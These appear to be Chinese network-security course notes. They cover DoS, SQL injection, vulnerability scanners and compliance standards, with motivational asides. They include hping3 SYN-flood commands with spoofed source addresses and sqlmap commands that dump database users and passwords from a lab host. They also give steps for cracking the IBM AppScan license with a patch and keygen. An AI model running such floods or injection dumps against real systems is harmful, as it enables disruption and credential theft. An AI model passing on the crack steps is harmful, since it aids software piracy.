所有坚持的事情最后结果都是美好的,如果没有,说明还没有到最后!
==========================================
回顾:
1,DoS 拒绝服务攻击
DDoS 分布式拒绝服务攻击
hping3 -i u10 -a 1.1.1.1 -p 3389 -S 192.168.1.1
hping3 -i u10 -p 3389 -S --rand-source 192.168.1.1
2, 漏洞 --攻击 MS12-020 RDP远程桌面的漏洞 -----蓝屏
--入侵/渗透 MS17-010 永恒之蓝 -----勒索病毒
---账号、密码、拍照截屏、远程登录 等
3,openvas ---系统的扫描、开源的 、免费的
下载 、安装 耗时
--会创建扫面任务
--查看结果
=======================================
appscan WEB站点脆弱性评估软件
中文的
IBM公司的
联网状态下 浏览器输入:http://demo.testfire.net
未联网状态下 @@ 打开PHPSTUDY 网站程序 快速建站 ---点击启动 ---- 出现两个绿点
LAMP LNMP
@@ 浏览器输入 :http://127.0.0.1/sqli-labs
@@打开appscan 新建扫面 --输入上面的网址
@@查看安全报告
报许可证错误解决方案:
1.Install //安装软件程序
2.copy patch.exe to $AppScan installation dir$(extc. C:\Program Files\IBM\Rational AppScan)
//将patch.exe复制到目录下
3.Run patch.exe //在目录下运行patch.exe
4.Run Keygen.exe //接下来运行Keygen.exe ,生成license.lic
5.Copy license.lic to $AppScan installation dir$\License(extc. C:\Program Files\IBM\Rational AppScan\License)
//将生成的license.lic复制到目录下
6.run AppScan and Update the Secure database,enjoy it!
//重新启动APPscan程序
想的太多,做的太少!
感觉才华配不上野心!
信心!!!------
只要开始,就不晚!!!
7,SQL注入原理:
程序没有对用户输入数据的合法性进行判断,使黑客可以绕过应用程序限制,构造一段SQL语句并传递到数据库中,实现对数据库的操作
SQL注入危害:搜集数据库信息
增加、删除、修改数据库
借助数据库攻入操作系统-----产生更大危害
root@kali:~# sqlmap -u 192.168.0.129/sqli-labs/less-1/?id=1 //探测网站是否有SQL注入漏洞
root@kali:~# sqlmap -u 192.168.0.129/sqli-labs/less-1/?id=1 --dbs //查看目标网站后台数据库信息
root@kali:~# sqlmap -u 192.168.0.129/sqli-labs/less-1/?id=1 --users //查看目标网站后台数据库账户
root@kali:~# sqlmap -u 192.168.0.129/sqli-labs/less-1/?id=1 --passwords //查看账户对应的密码
8, 社会工程学 :利用人性的弱点实施非技术渗透行为
人际关系学+心理学
黑客--米特尼克 ------黑客之首 ---欺骗的艺术
9,ISO27001 管理体系认证相当于ISO9001质量认证
等级保护 属于网络安全法里重要的 一部分内容
网络安全法发布 2016年 11月份
实施:2017年6月份
等级保护五个动作:定级 、备案、整改、评测、监督检查
定级过程中 :S类 --业务信息类
A类 --系统服务类
S类与A类 任意等级取最高的定级!